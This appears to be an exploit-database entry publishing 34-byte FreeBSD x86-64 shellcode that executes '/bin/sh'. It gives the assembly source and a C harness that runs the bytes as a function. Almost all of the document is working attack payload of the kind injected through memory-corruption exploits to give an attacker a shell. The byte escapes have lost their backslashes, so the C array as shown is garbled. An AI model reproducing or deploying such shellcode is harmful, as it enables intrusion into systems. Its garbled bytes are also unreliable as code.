[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : freebsd/x86-64 execve /bin/sh shellcode 34 bytes
# Published : 2009-05-15
# Author : c0d3_z3r0
# Previous Title : freebsd/x86-64 exec("/bin/sh") shellcode 31 bytes
# Next Title : linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes
/*
Anderson Eduardo < c0d3_z3r0 >
Hack'n Roll
http://anderson.hacknroll.com
http://blog.hacknroll.com
.section .text
.globl _start
_start:
xor %rcx,%rcx
jmp string
main:
popq %rsi
movq %rsi,%rdi
pushq %rsi
pushq %rcx
movq %rsp,%rsi
movq %rcx,%rdx
movb $0x3b,%al
syscall
string:
callq main
.string "/bin/sh"
*/
int main(void)
{
char shellcode[] =
"x48x31xc9"
"xebx10"
"x5e"
"x48x89xf7"
"x56"
"x51"
"x48x89xe6"
"x48x89xca"
"xb0x3b"
"x0fx05"
"x48xe8xeaxffxffxff"
"x2f"
"x62"
"x69"
"x6e"
"x2f"
"x73x68";
(*(void (*)()) shellcode)();
//Hack'n Roll
return 0;
}
// www.Syue.com [2009-05-15]